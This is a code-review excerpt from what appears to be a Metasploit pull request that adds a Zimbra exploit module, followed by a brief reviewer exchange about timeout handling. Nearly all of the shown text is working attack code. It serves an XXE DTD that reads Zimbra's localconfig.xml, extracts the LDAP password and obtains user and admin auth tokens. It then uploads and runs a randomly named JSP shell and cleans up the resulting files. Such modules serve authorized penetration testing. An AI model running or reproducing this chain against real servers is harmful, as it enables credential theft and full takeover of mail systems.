modules/exploits/linux/http/zimbra_xxe_rce.rb

```diff
@@ -0,0 +1,254 @@
+    post_data = data.to_s
+
+    send_request_cgi({
+      'method'          => 'POST',
+      'uri'             => normalize_uri(target_uri, '/service/extension/clientUploader/upload'),
+      'ctype'           => 'multipart/form-data; boundary=' + data.bound,
+      'data'            => post_data,
+      'cookie'          => cookie
+    })
+  end
+
+  def check
+    res = xxe_req(soap_discover(true))
+    if res.body =~ /zimbra/
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Unknown
+  end
+
+  def on_request_uri(cli, req)
+    ent_file = rand_text_alpha_lower(4..8)
+    ent_eval = rand_text_alpha_lower(4..8)
+
+    dtd =  <<~HERE
+    <!ENTITY % #{ent_file} SYSTEM "file:///opt/zimbra/conf/localconfig.xml">
+    <!ENTITY % #{ent_eval} "<!ENTITY #{@ent_data} '<![CDATA[%#{ent_file};]]>'>">
+    %#{ent_eval};
+    HERE
+    send_response(cli, dtd)
+  end
+
+  def primer
+    datastore['SSL'] = @ssl
+    res = xxe_req(soap_discover)
+    fail_with(Failure::UnexpectedReply, 'Password not found') unless res.body =~ /ldap_password.*?value&gt;(.*?)&lt;\/value/m
+    password = $1
+    username = 'zimbra'
+
+    print_good("Password found: #{password}")
+
+    data = soap_auth(username, password, false)
+    res = cookie_req(data)
+
+    fail_with(Failure::NoAccess, 'Failed to authenticate') unless res.get_cookies =~ /ZM_AUTH_TOKEN=([^;]+;)/
+    auth_cookie = $1
+
+    print_good("User cookie retrieved: ZM_AUTH_TOKEN=#{auth_cookie}")
+
+    data = soap_auth(username, password)
+    res = proxy_req(data, auth_cookie)
+
+    fail_with(Failure::NoAccess, 'Failed to authenticate') unless res.get_cookies =~ /(ZM_ADMIN_AUTH_TOKEN=[^;]+;)/
+    admin_cookie = $1
+
+    print_good("Admin cookie retrieved: #{admin_cookie}")
+
+    stager_name = "#{rand_text_alpha(8..16)}.jsp"
+    print_status('Uploading jsp shell')
+    res = upload_file(stager_name, payload.generate, admin_cookie)
+
+    fail_with(Failure::Unknown, "#{peer} - Unable to upload stager") unless res && res.code == 200
+    # Only shell sessions are supported
+    register_file_for_cleanup("`find /opt/zimbra/ -type f -regex '.*downloads/.*#{stager_name}'`")
+    register_file_for_cleanup("`find /opt/zimbra/ -type f -regex '.*downloads/.*#{stager_name[0...-4]}.*1StreamConnector.class'`")
+    register_file_for_cleanup("`find /opt/zimbra/ -type f -regex '.*downloads/.*#{stager_name[0...-4]}.*class'`")
+    register_file_for_cleanup("`find /opt/zimbra/ -type f -regex '.*downloads/.*#{stager_name[0...-4]}.*java'`")
+
+    print_status("Executing payload on /downloads/#{stager_name}")
+    res = send_request_cgi({
+      'uri'             => normalize_uri(target_uri, "/downloads/#{stager_name}"),
+      'cookie'          => admin_cookie
+    })
+  end
+
+  def exploit
+    @ent_data = rand_text_alpha_lower(4..8)
+    @ssl = datastore['SSL']
+    datastore['SSL'] = false
+    Timeout.timeout(datastore['HTTPDELAY']) { super }
+  rescue Timeout::Error
```

Comment:
Do you want to add an error message to this?

Reply:
Nope. When the timeout occurs the HttpServer is stopped and a message is printed for that.